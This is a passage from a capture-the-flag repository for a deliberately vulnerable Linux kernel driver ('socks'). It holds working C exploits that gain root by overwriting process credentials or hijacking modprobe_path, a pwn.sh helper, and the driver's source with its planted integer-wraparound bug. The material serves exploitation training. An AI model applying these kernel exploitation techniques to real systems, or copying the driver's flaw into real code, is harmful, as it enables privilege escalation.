148 |   sock_send(fds[3], buf, sizeof(buf));
149 | 
150 |   /* Smash `size` and set LSB of buffer to 0x00 */
151 |   *((uint64_t *) (ptr + 0xff8)) = 8;
152 |   sock_send(fds[0], ptr + 0xff8, 9);
153 |   /* Read 0x20 bytes from modified buffer pointer */
154 |   sock_recv(fds[2], buf, sizeof(buf));
155 |   memcpy(&leaked, buf + 8, sizeof(leaked)); /* no misaligned/aliasing cast */
156 |   return leaked;
157 | }
158 | /* Exploit entry point: leak a heap address, derive the kernel base, then replace our creds with init's. Exits non-zero on failure. */
159 | int main(int argc, char* argv[argc+1]) {
160 | 
161 | #ifdef USE_SHMEM_LEAK
162 | 	int       shm_id;
163 | 	key_t     mem_key = IPC_PRIVATE;	/* any fresh segment will do */
164 | 	int       *shm_ptr;
165 | 
166 | 	shm_id = shmget(mem_key, 4*sizeof(int), IPC_CREAT | 0666);
167 | 	if (shm_id < 0) {
168 | 	     printf("*** shmget error (server) ***\n");
169 | 	     exit(1);
170 | 	}
171 | #endif
172 | 
173 | 	/* Open and initialize 1000 socks (kept in spray_fd) before the four the exploit uses. */
174 | 	for (size_t i = 0; i < 1000; ++i) {
175 | 		int fd = open("/dev/socks", O_RDWR);
176 | 		sock_init(fd, -1);
177 | 		spray_fd[i] = fd;
178 | 	}
179 | 
180 | 	for (size_t i = 0; i < 4; ++i) {
181 | 		fds[i] = open("/dev/socks", O_RDWR);
182 | 		if (fds[i] == -1) {
183 | 			perror("open()");
184 | 			exit(1);	/* nothing below works without all four socks */
185 | 		}
186 | 		printf("[+] Intializing socket: %d\n", fds[i]);
187 | 		sock_init(fds[i], ULONG_MAX);
188 | 	}
189 | 	sock_listen(fds[0],  "socks");
190 | 	sock_connect(fds[1], "socks");
191 | 
192 | 	sock_listen(fds[2],  "socks2");
193 | 	sock_connect(fds[3], "socks2");
194 | 
195 | 	ptr = mmap(0, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
196 | 	/* The second page must be inaccessible: read64/write64/leak send buffers that end one byte inside it. */
197 | 	if (ptr == MAP_FAILED || mprotect(ptr + 0x1000, 0x1000, PROT_NONE) != 0) {
198 | 		perror("mmap()/mprotect()");
199 | 		exit(1);
200 | 	}
201 | 	uint64_t addr = leak(), fds3 = 0;
202 | 	for(int i=0; i < 256; i+= 8) {
203 | 		uint64_t data = read64(addr + i);
204 | 		if (data == 0x4141414141414100) {
205 | 			/* found fds[3] ! */
206 | 			fds3 = addr + i;
207 | 		}
208 | 	}
209 | 
210 | 	if (!fds3) {
211 | 		printf("[!] Failed to find fds[3]\n");
212 | 		exit(1);
213 | 	}
214 | 
215 | 	printf("[*] fds[3] sock_buf_t at %lx\n", fds3);
216 | 	uint64_t target = fds3 - 4*0x20;
217 | 
218 | 	/*
219 | 	 * Alright we've got a leak, let's find out where the kernel is.
220 | 	 */
221 | 
222 | 	/* Close spray_fd[999] and replace it by a shm_file_data (with USE_SHMEM_LEAK), */
223 | 	/* or by what open("/proc/self/stat") allocates otherwise; `target` is then read back. */
224 | 	close(spray_fd[999]);
225 | 
226 | #ifndef USE_SHMEM_LEAK
227 | 	int fdx = open("/proc/self/stat", O_RDONLY);
228 | 
229 | 	uint64_t single_start = read64(target);
230 | 	uint64_t kbase = single_start - SINGLE_START;
231 | 	printf("[*] Kernel base: 0x%lx\n", kbase);
232 | 
233 | #else 
234 | 
235 | 	shm_ptr = (int *) shmat(shm_id, NULL, 0);  /* attach */
236 | 	if (shm_ptr == (void *) -1) {	/* compare as a pointer, without truncating to int */
237 | 	     printf("*** shmat error (server) ***\n");
238 | 	     exit(1);
239 | 	}
240 | 
241 | 	
242 | 	
243 | 	uint64_t shmem_vm_ops = read64(target+8);
244 | 	uint64_t init_ipc_ns = read64(target+24);
245 | 
246 | 	uint64_t kbase = shmem_vm_ops - SHMEM_VM_OPS;
247 | 	printf("[*] Kernel base: 0x%lx\n", kbase);
248 | #endif 
249 | 
250 | 	/* Change our name to pwnypwny */
251 | 	prctl(PR_SET_NAME,"pwnypwny",NULL,NULL,NULL);
252 | 
253 | 	char buf[17] = {0};
254 | 
255 | 	/* Extract init_cred from init_task */
256 | 	uint64_t init_task = kbase + INIT_TASK;
257 | 	uint64_t init_cred = read64(init_task + CRED);
258 | 
259 | 	/* Find our task by name.  */
260 | 	uint64_t current = init_task;
261 | 
262 | 	do {
263 | 		*(uint64_t *)&buf[0] = read64(current + COMM);
264 | 		*(uint64_t *)&buf[8] = read64(current + COMM + 8);
265 | 
266 | 		if (strcmp(buf, "pwnypwny") == 0) {
267 | 			break;
268 | 		}
269 | 
270 | 		current = read64(current + TASKS) - TASKS;
271 | 	} while (current != init_task);
272 | 
273 | 
274 | 	if (current == init_task ) {
275 | 		printf("[*] Failed to find ourselves...\n");
276 | 		exit(1);
277 | 	}
278 | 
279 | 
280 | 	/*
281 | 	 * Replace our creds by those of init. We read the first qword 
282 | 	 * and increment it by 10. This increases the cred refcount by 
283 | 	 * 10, making sure we don't cause a use-after-free when the exploit
284 | 	 * process exits.
285 | 	 */
286 | 	uint64_t init_cred_qw0 = read64(init_cred);
287 | 	write64(init_cred, init_cred_qw0 + 10);
288 | 
289 | 	write64(current + CRED, init_cred);
290 | 	write64(current + CRED + 8, init_cred);
291 | 
292 | 
293 | 	printf("[*] We are: %d\n", getuid());
294 | 
295 | 	char *args[] = {"/bin/sh", NULL};
296 | 	execve("/bin/sh", args, NULL);
297 | 
298 | 	return 0;
299 | }
300 | 


--------------------------------------------------------------------------------
/solution/exploit_modprobe_path.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <sys/types.h>
 3 | #include <sys/stat.h>
 4 | #include <fcntl.h>
 5 | #include <sys/ioctl.h>
 6 | #include <string.h>
 7 | #include <errno.h>
 8 | #include <netinet/in.h>
 9 | #include "socks.h"
10 | 
11 | typedef struct sock_buf {	/* userland copy of the layout main() forges */
12 | 	size_t size;		/* size of the data buffer */
13 | 	unsigned char *buffer;	/* pointer to the data */
14 | 	size_t read_index;	/* offset of unread data inside buffer */
15 | 	size_t write_index;	/* offset where new data will be written */
16 | 	// Inline buffer!
17 | } sock_buf_t;
18 | 
19 | /* Issue IOCTL_SOCKS_INIT on @fd with @size as the requested buffer size; returns the ioctl() result. */
20 | int sock_init(int fd, size_t size) {
21 | 	return ioctl(fd, IOCTL_SOCKS_INIT, size);
22 | }
23 | 
24 | /* Issue IOCTL_SOCKS_LISTEN on @fd under @name (truncated to fit); returns the ioctl() result. */
25 | int sock_listen(int fd, char *name) {
26 | 	/* Zero-filled, so the copy below always leaves the name terminated. */
27 | 	struct sock_name_param param = { .name = "" };
28 | 	strncpy(param.name, name, sizeof(param.name) -1);
29 | 	printf("[*] Trying to listen in %s\n", param.name);
30 | 	return ioctl(fd, IOCTL_SOCKS_LISTEN, &param);
31 | }
32 | 
33 | /* Issue IOCTL_SOCKS_CONNECT on @fd for the socket named @name; returns the ioctl() result. */
34 | int sock_connect(int fd, char *name) {
35 | 	struct sock_name_param param = { .name = "" };	/* zero-filled */
36 | 	strncpy(param.name, name, sizeof(param.name) -1);
37 | 	printf("[*] Trying to connect to %s\n", param.name);
38 | 	return ioctl(fd, IOCTL_SOCKS_CONNECT, &param);
39 | }
40 | /* Issue IOCTL_SOCKS_SEND on @fd with @size bytes starting at @buffer; returns the ioctl() result. */
41 | int sock_send(int fd, void *buffer, size_t size) {
42 | 	struct sock_buffer_param param = { .size = size, .buffer = buffer};
43 | 	return ioctl(fd, IOCTL_SOCKS_SEND, &param);
44 | }
45 | /* Issue IOCTL_SOCKS_RECV on @fd, asking for up to @size bytes into @buffer; returns the ioctl() result. */
46 | int sock_recv(int fd, void *buffer, size_t size) {
47 | 	struct sock_buffer_param param = { .size = size, .buffer = buffer};
48 | 	return ioctl(fd, IOCTL_SOCKS_RECV, &param);
49 | }
50 | 
51 | 
52 | int main(int argc, char const *argv[])
53 | {
54 | 
55 | 	for(int i=0; i < 0x400 - 0x10; i++) {
56 | 		// Open a bunch of size 0 (alloc size should be 0x20)
57 | 		int fd = open("/dev/socks", O_RDONLY);
58 | 		sock_init(fd, 0x0);
59 | 	}
60 | 	/* Let's have two socks */
61 | 
62 | 	int fd1 = open("/dev/socks", O_RDONLY);
63 | 	int fd2 = open("/dev/socks", O_RDONLY);
64 | 	if (fd1 < 0 || fd2 < 0) {
65 | 		perror("open()");
66 | 		return 1;	/* both socks are required for the write below */
67 | 	}
68 | 
69 | 	sock_init(fd1, -1);
70 | 	sock_listen(fd1, "test_socket");
71 | 	sock_init(fd2, 0x00);
72 | 	sock_connect(fd2, "test_socket");
73 | 
74 | 	/* Data sent on fd2 is pushed into fd1's buffer => intended to corrupt buffer size and pointer of fd2 */
75 | 	
76 | 	sock_buf_t buf;
77 | 	buf.size = 0x100;
78 | 	buf.buffer = (unsigned char *) 0xffffffff82023ae0UL; // modprobe path
79 | 	buf.read_index = 0x00;
80 | 	buf.write_index = 0x00;
81 | 	sock_send(fd2, &buf, sizeof(buf));
82 | 
83 | 	/* NOW THIS PERFORMS ARBITRARY WRITE */
84 | 	char pwn[] = "/home/user/pwn.sh";
85 | 	sock_send(fd1, pwn, sizeof(pwn));
86 | 
87 | 
88 | 	/* Trigger launch of pwn.sh */
89 | 	socket(AF_INET,SOCK_STREAM,132);
90 | 
91 | 	return 0;
92 | }
93 | 


--------------------------------------------------------------------------------
/solution/images/corrupted_ptr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/corrupted_ptr.png


--------------------------------------------------------------------------------
/solution/images/data_sent.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/data_sent.png


--------------------------------------------------------------------------------
/solution/images/normal_alloc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/normal_alloc.png


--------------------------------------------------------------------------------
/solution/images/ovf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/ovf.png


--------------------------------------------------------------------------------
/solution/images/setup.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/esanfelix/r2con2019-ctf-kernel/8f8fa1e9f84d52daabc63275c57c8436a7c56354/solution/images/setup.png


--------------------------------------------------------------------------------
/solution/pwn.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | id > /tmp/pwn3d                    # record the identity this script runs as
3 | cp /flag.txt /home/user/flag.txt   # copy the flag into the user's home directory
4 | chmod 777 /home/user/flag.txt      # make the copy accessible to every user
5 | 


--------------------------------------------------------------------------------
/solution/socks.h:
--------------------------------------------------------------------------------
 1 | #ifndef __SOCKS_H__
 2 | 
 3 | #include <stdint.h>
 4 | #include <sys/ioctl.h>
 5 | 
 6 | #define __SOCKS_H__
 7 | /* Parameter for listen/connect ioctls */
 8 | struct sock_name_param {
 9 | 	char name[64];
10 | };
11 | /* Parameter for send/recv ioctls */
12 | struct sock_buffer_param {
13 | 	uint64_t size;
14 | 	void *buffer;
15 | };
16 | /* ioctl codes */
17 | #define IOCTL_SOCKS_INIT			_IOWR('s', 1, uint64_t)
18 | #define IOCTL_SOCKS_LISTEN		_IOWR('s', 2, struct sock_name_param)
19 | #define IOCTL_SOCKS_CONNECT		_IOWR('s', 3, struct sock_name_param)
20 | #define IOCTL_SOCKS_SEND			_IOWR('s', 4, struct sock_buffer_param)
21 | #define IOCTL_SOCKS_RECV			_IOWR('s', 5, struct sock_buffer_param)
22 | #define IOCTL_SOCKS_RESIZE		_IOWR('s', 6, uint64_t)
23 | 
24 | #endif


--------------------------------------------------------------------------------
/source/Makefile:
--------------------------------------------------------------------------------
 1 | # Simple Makefile to build a simple misc driver
 2 | # Nick Glynn <Nick.Glynn@feabhas.com>
 3 | #
 4 | # Builds socks.ko out of tree against the kernel build directory in KDIR.
 5 | obj-m += socks.o
 6 | KDIR ?= /lib/modules/$(shell uname -r)/build
 7 | PWD := $(shell pwd)
 8 | 
 9 | CC := $(CROSS_COMPILE)gcc
10 | .PHONY: all clean
11 | all:
12 | 		$(MAKE) -C $(KDIR) M=$(PWD) modules
13 | 
14 | clean:
15 | 		-$(MAKE) -C $(KDIR) M=$(PWD) clean
16 | 		rm -f *.o *.ko *.mod.c *.mod.o modules.order Module.symvers
17 | 


--------------------------------------------------------------------------------
/source/socks.c:
--------------------------------------------------------------------------------
  1 | #include <linux/miscdevice.h>
  2 | #include <linux/fs.h>
  3 | #include <linux/kernel.h>
  4 | #include <linux/module.h>
  5 | #include <linux/types.h>
  6 | #include <linux/list.h>
  7 | #include <linux/sched/mm.h>
  8 | #include <linux/slab.h>
  9 | #include <linux/mm.h>
 10 | #include <linux/uaccess.h>
 11 | 
 12 | #include "socks.h"
 13 | 
 14 | #include <linux/spinlock.h>
 15 | 
 16 | /* Global device to keep track of sockets (holds the list of listening sockets and its lock) */
 17 | sock_dev_t sock_device;
 18 | 
 19 | #define MAX_SIZE 0x1000	/* upper bound checked by socks_ioctl_init on header + data size */
 20 | 
 21 | /*
 22 |  * Initialize a socket with a buffer of the size given in @arg. Returns 0, -EINVAL (too large or already initialized) or -ENOMEM.
 23 |  */
 24 | static long socks_ioctl_init(sock_t *sock, unsigned long arg) {
 25 |     uint64_t size = arg + sizeof(sock_buf_t); /* header + data; unsigned add, wraps for @arg close to the 64-bit maximum */
 26 |     sock_buf_t *buf = NULL;
 27 |     int err = 0;
 28 | 
 29 |     // Sanity check without locking the buffer. NOTE(review): a wrapped `size` passes it too; this looks like the intended challenge bug.
 30 |     if (size > MAX_SIZE) {
 31 |         return -EINVAL;
 32 |     }
 33 | 
 34 |     // First off: lock the buffer
 35 | 
 36 |     spin_lock(&sock->lock);
 37 | 
 38 |     if (sock->state != UNINITIALIZED) {
 39 |         err = -EINVAL;
 40 |         goto out_unlock;
 41 |     }
 42 | 
 43 |     buf = kzalloc(size, GFP_KERNEL); /* NOTE(review): GFP_KERNEL allocation made while sock->lock is held; confirm this cannot sleep */
 44 |     printk(KERN_ALERT "Allocated ptr %llx\n", buf); /* NOTE(review): %llx is given a pointer argument */
 45 | 
 46 |     if (IS_ERR_OR_NULL(buf)) {
 47 |         err = (buf ? PTR_ERR(buf) : -ENOMEM);
 48 |         goto out_unlock;
 49 |     }
 50 | 
 51 |     sock->buf = buf;
 52 |     sock->buf->size = size - sizeof(sock_buf_t); /* equals the original @arg, even when `size` wrapped */
 53 |     sock->buf->write_index = 0;
 54 |     sock->buf->read_index = 0;
 55 |     sock->buf->buffer = (unsigned char *)buf + sizeof(sock_buf_t); // Buffer is inline
 56 | 
 57 |     sock->state = INITIALIZED;
 58 | 
 59 |     pr_info("Initialized socket with buffer size %lx\n", sock->buf->size);
 60 | 
 61 | 
 62 | out_unlock:
 63 |     spin_unlock(&sock->lock);
 64 |     return err;
 65 | }
 66 | 
 67 | /*
 68 |  * Look up @name in sock_device.listening. Returns the matching socket or
 69 |  * NULL when no listening socket has that name.
 70 |  */
 71 | static sock_t *socks_find_listening_device(char *name) {
 72 |     sock_t *cur = NULL;
 73 |     pr_info("Searching for socket %s\n", name);
 74 | 
 75 |     list_for_each_entry(cur, &sock_device.listening, listening_list) {
 76 |         if (strcmp(cur->name, name) == 0) {
 77 |             return cur;
 78 |         }
 79 |     }
 80 |     return NULL;
 81 | }
 82 | 
 83 | /*
 84 |  * Handler for IOCTL_SOCKS_LISTEN. If successful, the socket is in the
 85 |  * LISTENING state under the provided name and linked into sock_device.listening.
 86 |  * Returns 0, -EFAULT (parameter not readable) or -EINVAL (wrong state / name taken).
 87 |  */
 88 | 
 89 | static long socks_ioctl_listen(sock_t *sock, unsigned long arg) {
 90 |     struct sock_name_param * __user user_param = (struct sock_name_param * __user)arg;
 91 |     struct sock_name_param local_param, *param = &local_param;
 92 |     int err = 0;
 93 | 
 94 |     /* Fail if copy_from_user is bad */
 95 |     if (copy_from_user(param, user_param, sizeof(*param))) {
 96 |         return -EFAULT;
 97 |     }
 98 | 
 99 |     /* Make sure we null-terminate the string */
100 |     param->name[sizeof(param->name) -1] = '\0';
101 | 
102 |     pr_info("Length of name: %d\n", strlen(param->name)); /* NOTE(review): %d is given the size_t result of strlen() */
103 | 
104 | 
105 |     spin_lock(&sock->lock);
106 | 
107 |     /*
108 |      * Not allowed to listen unless we are in initialized
109 |      * state.
110 |      */
111 |     if (sock->state != INITIALIZED) {
112 |         err = -EINVAL;
113 |         goto out_unlock;
114 |     }
115 | 
116 |     /* Make sure there is no other socket with this name (sock_device.lock nests inside sock->lock) */
117 |     spin_lock(&sock_device.lock);
118 |     if (socks_find_listening_device(param->name)) {
119 |         err = -EINVAL;
120 |         pr_err("There's already a socket with that name");
121 |         spin_unlock(&sock_device.lock);
122 |         goto out_unlock;
123 |     }
124 | 
125 |     /* Alright, nobody else on that list. Add to the list and set to listening */
126 |     strcpy(sock->name, param->name); /* both arrays are 64 bytes and param->name was terminated above */
127 |     sock->state = LISTENING;
128 |     list_add(&sock->listening_list, &sock_device.listening);
129 |     pr_info("Socket is now listening at %s\n", param->name);
130 |     spin_unlock(&sock_device.lock);
131 |     
132 | out_unlock:
133 |     spin_unlock(&sock->lock);
134 |     return err;
135 | }
136 | /* Handler for IOCTL_SOCKS_CONNECT: pairs @sock with the listening socket named in the user parameter; both end up CONNECTED. Returns 0, -EFAULT or -EINVAL. */
137 | static long socks_ioctl_connect(sock_t *sock, unsigned long arg) {
138 |     struct sock_name_param * __user user_param = (struct sock_name_param * __user)arg;
139 |     struct sock_name_param local_param, *param = &local_param;
140 |     sock_t *peer = NULL;
141 |     int err = 0;
142 | 
143 |     /* Fail if copy_from_user is bad */
144 |     if (copy_from_user(param, user_param, sizeof(*param))) {
145 |         return -EFAULT;
146 |     }
147 | 
148 |     /* Make sure we null-terminate the string (63 is the last index of the 64-byte name) */
149 |     param->name[63] = '\0';
150 | 
151 |     pr_info("Length of name: %d\n", strlen(param->name)); /* NOTE(review): %d is given the size_t result of strlen() */
152 | 
153 |     spin_lock(&sock->lock);
154 | 
155 |     /*
156 |      * Not allowed to connect unless we are in initialized
157 |      * state.
158 |      */
159 |     if (sock->state != INITIALIZED) {
160 |         err = -EINVAL;
161 |         goto out_unlock;
162 |     }
163 | 
164 |     /* Find a listening socket with that name */
165 |     spin_lock(&sock_device.lock);
166 |     if ( (peer = socks_find_listening_device(param->name)) == NULL) {
167 |         pr_err("No socket with that name found");
168 |         err = -EINVAL;
169 |         spin_unlock(&sock_device.lock);
170 |         goto out_unlock;
171 |     }
172 | 
173 |     /* Remove peer from listening list; peer->lock is taken before the list lock is dropped */
174 |     spin_lock(&peer->lock);
175 |     list_del_init(&peer->listening_list);
176 |     spin_unlock(&sock_device.lock);
177 | 
178 |     /* Connect the two sockets */
179 |     sock->state = CONNECTED;
180 |     sock->peer = peer;
181 |     peer->peer = sock;
182 |     peer->state = CONNECTED;
183 | 
184 |     pr_info("Successfully connected to %s\n", param->name);
185 |     spin_unlock(&peer->lock);
186 | 
187 | out_unlock:
188 |     spin_unlock(&sock->lock);
189 |     return err;
190 | }
191 | 
192 | /*
193 |  * Number of bytes currently queued in @buf (written but not yet read).
194 |  */
195 | static size_t sock_buf_count(sock_buf_t *buf) {
196 |     size_t rd = buf->read_index;
197 |     size_t wr = buf->write_index;
198 | 
199 |     /* Wrapped around: data lives in [read_index, size) + [0, write_index) */
200 |     if (wr < rd) {
201 |         return (buf->size - rd) + wr;
202 |     }
203 | 
204 |     /* write_index at or past read_index: a single contiguous run */
205 |     return wr - rd;
206 | }
207 | 
208 | /* Free space in @buf: its size minus the bytes currently queued. */
209 | static size_t sock_buf_left(sock_buf_t *buf) {
210 |     size_t used = sock_buf_count(buf);
211 | 
212 |     return buf->size - used;
213 | }
214 | 
215 | /*
216 |  * Push @size bytes from userland @buffer to @buf, if enough space is left.
217 |  * Returns @size on success, or -ENOMEM when the data does not fit or a copy fails (write_index is then unchanged).
218 |  */
219 | static long socks_push(sock_buf_t *buf, void * __user buffer, size_t size) {
220 |     /* Nothing to copy; returning here also keeps `% buf->size` away from a zero-sized buffer. */
221 |     if (size == 0) {
222 |         return 0;
223 |     }
224 | 
225 |     /* If data doesn't fit, fail. */
226 |     if (sock_buf_left(buf) < size) {
227 |         return -ENOMEM;
228 |     }
229 | 
230 |     /*
231 |      * First chunk: up to read_index if it's bigger than write_index, or up to end of buffer otherwise.
232 |      */
233 |     size_t max_write_index = (buf->read_index > buf->write_index) ? buf->read_index : buf->size;
234 |     size_t copy1_size = min(size, max_write_index - buf->write_index);
235 |     size_t prev_write_index = buf->write_index;
236 | 
237 |     if (copy_from_user(buf->buffer + buf->write_index, buffer, copy1_size)) {
238 |         return -ENOMEM;
239 |     }
240 | 
241 |     /* Update our write index */
242 |     buf->write_index = (buf->write_index + copy1_size) % buf->size;
243 | 
244 |     /* More to copy, this time to beginning of buffer */
245 |     if (size > copy1_size) {
246 |         size_t copy_left = size - copy1_size;
247 |         if ( (sock_buf_left(buf) < copy_left) || 
248 |             copy_from_user(buf->buffer + buf->write_index, buffer + copy1_size, copy_left)) { /* continue after the first chunk */
249 |             /* Failed to copy, roll back */
250 |             buf->write_index = prev_write_index;
251 |             return -ENOMEM;            
252 |         }
253 | 
254 |         /* Update write index again */
255 |         buf->write_index = (buf->write_index + copy_left) % buf->size;
256 |     }
257 | 
258 |     return size;
259 | }
260 | 
261 | /*
262 |  * Implement the logic to taking data out of the socket buffer.
263 |  * Reads at most @size bytes into the userland @buffer. Returns the byte count, -EWOULDBLOCK if empty, -ENOMEM on copy failure.
264 |  */
265 | static long socks_pull(sock_buf_t *buf, void * __user buffer, size_t size) {
266 | 
267 |     /* Check that the buffer has some data */
268 |     size_t count = sock_buf_count(buf);
269 |     if ( count == 0) {
270 |         return -EWOULDBLOCK;
271 |     }
272 | 
273 |     /* We are going to read as much as we can, up to size */
274 |     size_t to_read = min(count, size);
275 | 
276 |     /* Read from read_index to the end or to to_read, whatever is smaller */
277 |     size_t copy1_size = min(to_read, buf->size - buf->read_index);
278 |     size_t prev_read_index = buf->read_index;
279 | 
280 |     if (copy_to_user(buffer, buf->buffer + buf->read_index, copy1_size)) {
281 |         return -ENOMEM;
282 |     } 
283 | 
284 |     /* Update read index */
285 |     buf->read_index = (buf->read_index + copy1_size) % buf->size;
286 | 
287 |     /* Do we still have something to read? */
288 |     if (to_read > copy1_size) {
289 |         /* In this case read_index must have rolled over. WARN_ON just in case */
290 |         WARN_ON(buf->read_index != 0);
291 | 
292 |         size_t left = to_read - copy1_size;
293 |         if (copy_to_user(buffer + copy1_size, buf->buffer + buf->read_index, left)) { /* append after the first chunk */
294 |             /* Failed to copy, ignore the data and return ENOMEM */
295 |             buf->read_index = prev_read_index;
296 |             return -ENOMEM;
297 |         }
298 | 
299 |         /* Update read index again, by the size of the second chunk */
300 |         buf->read_index = (buf->read_index + left) % buf->size;
301 | 
302 |     }
303 | 
304 |     return (long)to_read;
305 | }
306 | 
307 | /*
308 |  * Handler for IOCTL_SOCKS_SEND: pushes param.size bytes from param.buffer into the
309 |  * peer's sock_buf_t. Returns the socks_push() result, -EFAULT or -EINVAL (not CONNECTED).
310 |  */
311 | static long socks_ioctl_send(sock_t *sock, unsigned long arg) {
312 |     struct sock_buffer_param * __user user_param = (struct sock_buffer_param * __user)arg;
313 |     struct sock_buffer_param local_param, *param = &local_param;
314 |     int err = 0;
315 | 
316 |     /* Fail if copy_from_user is bad */
317 |     if (copy_from_user(param, user_param, sizeof(*param))) {
318 |         return -EFAULT;
319 |     }
320 | 
321 |     spin_lock(&sock->lock);
322 | 
323 |     if (sock->state != CONNECTED) {
324 |         /* Must be connected to send! */
325 |         err = -EINVAL;
326 |         goto out_unlock_self;
327 |     }
328 | 
329 |     spin_unlock(&sock->lock); /* NOTE(review): sock->peer is dereferenced below without sock->lock held */
330 | 
331 |     /* Try to push the data to the peer; socks_push() copies from user memory under peer->lock */
332 |     spin_lock(&sock->peer->lock);
333 |     err = socks_push(sock->peer->buf, param->buffer, param->size);
334 |     spin_unlock(&sock->peer->lock);
335 | 
336 |     return err;
337 | 
338 | out_unlock_self:
339 |     spin_unlock(&sock->lock);
340 |     return err;
341 | }
342 | 
343 | /*
344 |  * Handler for IOCTL_SOCKS_RECV: pulls up to param.size bytes from this socket's own
345 |  * buffer into param.buffer. Returns the socks_pull() result, -EFAULT or -EINVAL (not CONNECTED).
346 |  */
347 | static long socks_ioctl_recv(sock_t *sock, unsigned long arg) {
348 |     struct sock_buffer_param * __user user_param = (struct sock_buffer_param * __user)arg;
349 |     struct sock_buffer_param local_param, *param = &local_param;
350 |     int err = 0;
351 | 
352 |     /* Fail if copy_from_user is bad */
353 |     if (copy_from_user(param, user_param, sizeof(*param))) {
354 |         return -EFAULT;
355 |     }
356 | 
357 |     spin_lock(&sock->lock);
358 | 
359 |     if (sock->state != CONNECTED) {
360 |         /* Must be connected to receive! */
361 |         err = -EINVAL;
362 |         goto out_unlock_self;
363 |     }
364 | 
365 |     /* Try to read from the buffer; socks_pull() copies to user memory under sock->lock */
366 |     err = socks_pull(sock->buf, param->buffer, param->size);
367 | 
368 | out_unlock_self:
369 |     spin_unlock(&sock->lock);
370 |     return err;
371 | }
372 | 
373 | /*
374 |  * ioctl entry point for fds created by opening /dev/socks: dispatches @code to
375 |  * the matching handler and returns its result, or -EINVAL for any other code.
376 |  */
377 | static long socks_ioctl (struct file *file, unsigned int code, unsigned long arg) {
378 |     /* Per-fd socket stored in private_data by socks_open() */
379 |     sock_t *sock = (sock_t *)file->private_data;
380 | 
381 |     switch (code) {
382 |     case IOCTL_SOCKS_INIT:
383 |         return socks_ioctl_init(sock, arg);
384 | 
385 |     case IOCTL_SOCKS_LISTEN:
386 |         return socks_ioctl_listen(sock, arg);
387 | 
388 |     case IOCTL_SOCKS_CONNECT:
389 |         return socks_ioctl_connect(sock, arg);
390 | 
391 |     case IOCTL_SOCKS_SEND:
392 |         return socks_ioctl_send(sock, arg);
393 | 
394 |     case IOCTL_SOCKS_RECV:
395 |         return socks_ioctl_recv(sock, arg);
396 |     }
397 |     return -EINVAL; /* everything else, including IOCTL_SOCKS_RESIZE */
398 | }
399 | 
400 | /*
401 |  * Called when open("/dev/socks", ...) is executed. Allocates a zeroed sock_t
402 |  * (state UNINITIALIZED) and stores it in file->private_data. Returns 0 or -ENOMEM.
403 |  */
404 | static int socks_open(struct inode *inode, struct file *file)
405 | {
406 |     sock_t *sock = kzalloc(sizeof(*sock), GFP_KERNEL);
407 | 
408 |     if (!sock)
409 |         return -ENOMEM;
410 | 
411 |     /*
412 |      * private_data is used to keep driver-specific data. The 
413 |      * kernel does not touch this field at all, so drivers can
414 |      * place their data here and get it out e.g. in ioctl.
415 |      */
416 |     file->private_data = sock;
417 | 
418 |     /* Every handler takes this lock, so set it up explicitly instead of relying on zeroed memory. */
419 |     spin_lock_init(&sock->lock);
420 | 
421 |     /* Initialize empty listening_list head */
422 |     INIT_LIST_HEAD(&sock->listening_list);
423 |     pr_info("New socks successfully created!\n");
424 |     return 0;
425 | }
426 | /* Release handler (.release in socks_fops): detaches from a connected peer or from the listening list, then frees the buffer and the sock_t. Always returns 0. */
427 | static int socks_close(struct inode *inodep, struct file *filp)
428 | {
429 |     sock_t *sock =  (sock_t *)filp->private_data;
430 | 
431 |     spin_lock(&sock->lock);
432 | 
433 |     if (sock->state == CONNECTED ) {
434 |         /*
435 |          * If we were connected, let's make sure we disconnect 
436 |          * from the other end now.
437 |          */
438 | 
439 |         sock_t *peer = sock->peer;
440 |         sock->peer = NULL;
441 | 
442 |         spin_lock(&peer->lock); /* nested: sock->lock is still held */
443 |         peer->peer = NULL;
444 | 
445 |         /* Back to initialized for this peer */
446 |         peer->state = INITIALIZED;
447 |         /* Ignore any stale data (the peer keeps its buffer; only the indices are reset) */
448 |         peer->buf->write_index = 0;
449 |         peer->buf->read_index = 0;
450 | 
451 |         spin_unlock(&peer->lock);
452 | 
453 |     } else if (sock->state == LISTENING) {
454 |         /*
455 |          * If we were listening, remove from the listening list.
456 |          */ 
457 | 
458 |         spin_lock(&sock_device.lock);
459 |         list_del_init(&sock->listening_list);
460 |         spin_unlock(&sock_device.lock);
461 |     }
462 | 
463 |     if (sock->state != UNINITIALIZED) {
464 | 
465 |         /*
466 |          * Since we were initialized, we must have a buffer.
467 |          * Free it.
468 |          */
469 | 
470 |         kfree(sock->buf);
471 |     }
472 | 
473 |     spin_unlock(&sock->lock);
474 | 
475 |     /* Finally done, free our sock */
476 |     kfree(sock);
477 | 
478 |     return 0;
479 | }
480 | /* File operations installed on /dev/socks through socks_device.fops. */
481 | static const struct file_operations socks_fops = {
482 |     .owner			= THIS_MODULE,
483 |     .open			= socks_open,	/* allocates the per-fd sock_t */
484 |     .release		= socks_close,	/* tears the sock_t down again */
485 |     .llseek 		= no_llseek,
486 |     .unlocked_ioctl = socks_ioctl,	/* dispatches the IOCTL_SOCKS_* commands */
487 | };
488 | /* Misc device registered in misc_init() and removed in misc_exit(). */
489 | struct miscdevice socks_device = {
490 |     .minor = MISC_DYNAMIC_MINOR,
491 |     .name = "socks",
492 |     .fops = &socks_fops,
493 | };
494 | 
495 | static int __init misc_init(void)
496 | {
497 |     int error;
498 | 
499 |     INIT_LIST_HEAD(&sock_device.listening);
500 |     spin_lock_init(&sock_device.lock);
501 | 
502 |     error = misc_register(&socks_device);
503 |     if (error) {
504 |         pr_err("can't misc_register :(\n");
505 |         return error;
